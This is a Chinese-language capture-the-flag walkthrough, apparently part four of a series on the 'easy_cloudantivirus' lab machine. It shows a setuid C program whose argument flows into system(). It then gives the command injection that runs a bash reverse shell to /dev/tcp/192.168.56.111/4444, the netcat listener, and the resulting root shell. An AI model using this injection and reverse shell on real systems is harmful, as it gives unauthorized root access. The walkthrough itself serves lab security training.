靶机: easy_cloudantivirus( 四 ) _生活百科

其中还含有源码 update_cloudav.c 我们可以查看源码，发现执行此命令需要一个参数，我们完全可以故技重施

#include <stdio.h>int main(int argc, char *argv[]){char *freshclam="/usr/bin/freshclam";if (argc < 2){printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");return 1;}char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);sprintf(command, "%s %s", freshclam, argv[1]);setgid(0);setuid(0);system(command);return 0;}

获取 root 权限

Kali 设置 netcat -lvp 4444 监听 4444 端口
靶机上 shell 反弹 touch b.sh && echo 'bash -i >& /dev/tcp/192.168.56.111/4444 0>&1' > b.sh && ./update_cloudav "a | ls | grep 'xxxxx' | bash b.sh"

┌──(kali?kali)-[~]└─$ netcat -lvp 4444listening on [any] 4444 ...192.168.56.109: inverse host lookup failed: Unknown hostconnect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 56672bash: cannot set terminal process group (694): Inappropriate ioctl for devicebash: no job control in this shellroot@cloudav:~# ididuid=0(root) gid=0(root) groups=0(root),1001(scanner)

游戏结束 GAMEOVER